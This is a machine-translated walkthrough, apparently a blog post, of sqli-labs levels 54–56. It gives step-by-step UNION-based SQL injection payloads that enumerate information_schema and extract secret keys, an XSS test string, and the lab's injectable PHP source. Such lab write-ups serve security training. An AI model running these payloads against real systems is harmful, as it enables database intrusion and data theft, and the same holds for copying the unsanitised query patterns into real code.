Sqli labs customs clearance summary-page4

  less-54(GET type 、 Single quotation marks 、 The joint query )
  less-55(GET type 、 Numeric brackets 、 The joint query )
  less-56(GET type 、 Single quotation mark bracket 、 The joint query )

less-54

title ：GET - challenge - Union -10 queries allowed - Variation1

It's starting to be interesting here , Only allowed 10 A query

First step ： Measure closure

?id=1'

No echo , Exclude double quotation marks

The second step ： Measure closure

?id=1"

Exclude digital closure , Determine to close with single quotation marks

The third step ： Measure closure

?id=1' --+

Determined as '' closed

Step four ： Measure the number of query statement fields

This is very fascinating , If you are unlucky, you can't measure , At this time, I still use Dichotomy Go test

?id=1' order by 4 --+

Report errors , explain The number of query statement fields is less than 4

Step five ： Measure the number of query statement fields

?id=1' order by 3 --+

The number of fields in the query statement is 3 individual

Step six ： Measure the echo position of the front end , Along with the echo database

?id=-1' union select database(),database(),database() --+

Get a database named challenges

Step seven ： Get table name

?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

Get a table named rt85c5veac

Step eight ： Get field name

?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='rt85c5veac'),3 --+

Get the field name ：id,sessid,secret_F5D9,tryy

There's a man named Secret Field name

Step nine ： Get field value

?id=-1' union select 1,(select group_concat(secret_F5D9) from rt85c5veac),3 --+

obtain key：e3GqUNpU23vQcA9K2fGxOrNz

Submit

OK

Look at the source code

Incomplete paste , First look at index.php

The code of this file is the same as before
Except that the database uses $dbname1 = "challenges"; , Is the same

Let's see functions.php

There are many ways defined , Let's first look at the main function

$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';   //charset for dynamic generation of strings
// Generating a dynamic alfanumeric Table name with each purge.
$table = num_gen(10, $characters) ;

// Generating Secret key column.
$secret_key = "secret_".num_gen(4, $characters);

//retrieve dynamic table name from database.

Defines a string $characters
Called num_gen Method ,

1.num_gen()

function num_gen($string_length, $characters)
{
    
	$string = '';
 	for ($i = 0; $i < $string_length; $i++) 
	{
    
      		$string .= $characters[rand(0, strlen($characters) - 1)];
 	}
	return $string;
}

This method generates an in ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 In character The length is $string_length Random string of

$table Generated a length of 10 Random string of
$secret_key A degree of 4 Random string of

We are looking at other methods

2.table_name()

function table_name()
{
    
	include '../sql-connections/db-creds.inc';
	include '../sql-connections/sql-connect-1.php';
	$sql="SELECT table_name FROM information_schema.tables WHERE table_schema='$dbname1'";
	$result=mysqli_query($con1, $sql) or die("error in function table_name()".mysqli_error($con1));
	$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if(!$row)
	die("error in function table_name() output". mysqli_error($con1));
	else
	return $row[0];
}

This method queries challenges All the tables in the library , And back to The first table

3.column_name()

function column_name($idee)
{
    
	include '../sql-connections/db-creds.inc';
	include '../sql-connections/sql-connect-1.php';
	$table = table_name();
	$sql="SELECT column_name FROM information_schema.columns WHERE table_name='$table' LIMIT $idee,1";
	$result=mysqli_query($con1, $sql) or die("error in function column_name()".mysqli_error($con1));
	$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if(!$row)
	die("error in function column_name() result". mysqli_error($con1));
	else
	return $row[0];
}

This method queries challenges In the library The first table Field of ,$idee Limit which fields to output , And back to Field name

4.data()

function data($tab,$col)
{
    
	include '../sql-connections/db-creds.inc';
	include '../sql-connections/sql-connect-1.php';
	$sql="SELECT $col FROM $tab WHERE id=1";
	$result=mysqli_query($con1, $sql) or die("error in function column_name()".mysqli_error($con1));
	$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if(!$row)
	die("error in function column_name() result". mysqli_error($con1));
	else
	return $row[0];
}

This method is used to query $tab surface , return $col field value

5.next_tryy

function next_tryy()
{
    
	$table = table_name();
	//including the Mysql connect parameters.
	include '../sql-connections/db-creds.inc';
	include '../sql-connections/sql-connect-1.php';
	$sql = "UPDATE $table SET tryy=tryy+1 WHERE id=1";
	mysqli_query($con1, $sql) or die("error in function next_tryy()". mysqli_error($con1));
}

This method makes id=1 Of try Field field value +1

6.view_attempts

function view_attempts()
{
    
	include("../sql-connections/sql-connect-1.php");
	$table = table_name();
	$sql="SELECT tryy FROM $table WHERE id=1";
	$result=mysqli_query($con1, $sql) ;
	$row = mysqli_fetch_array($result, MYSQLI_BOTH);
	if(!$row)
	die("error in function view_attempts()". mysqli_error($con1));
	else
	return $row[0];	
}

This method queries id=1 Of try The field value of the field , And back to

Let's take a look at the main page index.php

$pag = $_SERVER['PHP_SELF'];

I'm here $pag The value of is

/sqli/Less-54/index.php 

$characters = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; //characterset for generating random data
$times= 10;
$table = table_name();
$col = column_name(1);     // session id column name
$col1 = column_name(2);   //secret key column name

$time Used to limit the number of queries
$table Used to obtain challenges Table name of , There is only one watch
$col and $col1 Get two field names respectively , There's a note at the back , Namely session id and secret key

'answer_key' yes
The following Submit, There is no value before clicking , therefore if Only later statements can be executed

'reset' yes

The button to remake the level in front , Nothing is empty , therefore if It will not be executed later , If you order , submitted , Will send a new one cookie

The latter part , If cookie Not empty , Is to cookie Add in table session id Value , and A month's time

Get the information from the front end id value , If exist
perform next_tryy() Method , In the table tryy value +1
And implement view_attempts() Method , The echo tryy value

next step , Judge tryy Whether the value exceeds 10 Time , If it exceeds, delete cookie, Jump back to the page , front $pag The obtained path is used here

The latter part is the general query , Front echo value

The latter part deals with , Submit key Is the correct code

It is very interesting that he uses
addslashes() and mysqli_real_escape_string() Escaped twice , I didn't think it was useful , But submit here

<script>alert(/xss/)</script>

You can find here There is xss Loophole Of

less-55

GET - challenge - Union - 14 queries allowed - Variation 2

First step ： Measure closure

?id=1'

No echo , Exclude double quotation marks

The second step ： Measure closure

?id=1"

No echo , Exclude single quotation marks , It is determined to be digital

The third step ： Measure closure

?id=1 --+

No echo , Continue to add parentheses

Step four ： Measure closure

?id=1) --+

With echo , Can be determined as () closed

Step five ： Measure the number of query statement fields

?id=1) order by 4 --+

explain The number of query statement fields is less than 4

Step six ： Measure the number of query statement fields

?id=1) order by 3 --+

explain The number of query statement fields is 3

Step seven ： Measure the echo position of the front end , Along with the echo database

Get the database name challenges

Step eight ： Get table name

?id=-1) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

Get a table named b6gqo9qti7

Step nine ： Get field name

?id=-1) union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='b6gqo9qti7'),3 --+

Get the field name id,sessid,secret_UHTF,tryy

Step 10 ： Get field value

?id=-1) union select 1,(select group_concat(secret_UHTF) from b6gqo9qti7),3 --+

obtain key:UUN75bQF8s7z116LDOpgUNp7

When I do this, I suddenly think of something , Include 54 Turn off

It is wrong to echo the database incidentally , Because the echo position cannot be determined 1,2,3 Which two of them

also 55 Relationship with 54 There is no difference between closing and closing

less-56

title ：GET - challenge - Union - 14 queries allowed - variation 3

First step ： Measure closure

?id=1'

No echo , Exclude double quotation marks

The second step ： Measure closure

?id=1"

With echo , Sure Exclude numeric , Determine to close with single quotation marks

The third step ： Measure closure

?id=1' --+

No echo , Continue to add parentheses

Step four ： Measure closure

?id=1') --+

With echo , That is the ('') closed

Step five ： Measure the number of query statement fields

?id=1') order by 4 --+

Report errors , explain The number of query statement fields is less than 4

Step six ： Measure the number of query statement fields

?id=1') order by 3 --+

With echo , explain The number of query statement fields is 3

Step seven ： Check the front echo position

?id=-1') union select 1,2,3 --+

2,3 Echo exists at

Step eight ： Get database name

?id=-1') union select 1,database(),3 --+

Get the database name ：challenges

Step nine ： Get table name

?id=-1') union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),3 --+

Get the name of the watch ：5ickf0b94k

Step 10 ： Get field name

?id=-1') union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='challenges' and table_name='5ickf0b94k'),3 --+

Get the field name ：id,sessid,secret_PK1F,tryy

Step 11 ： Get field value

?id=-1') union select 1,(select group_concat(secret_PK1F) from 5ickf0b94k),3 --+

obtain key：ZHMul4PlVGOjx8USXcH5Rgy6

and 55 Turn off 、54 It's the same , It's just a closure that becomes ('')

less-57

GET - challenge - Union - 14 queries allowed - Variation 4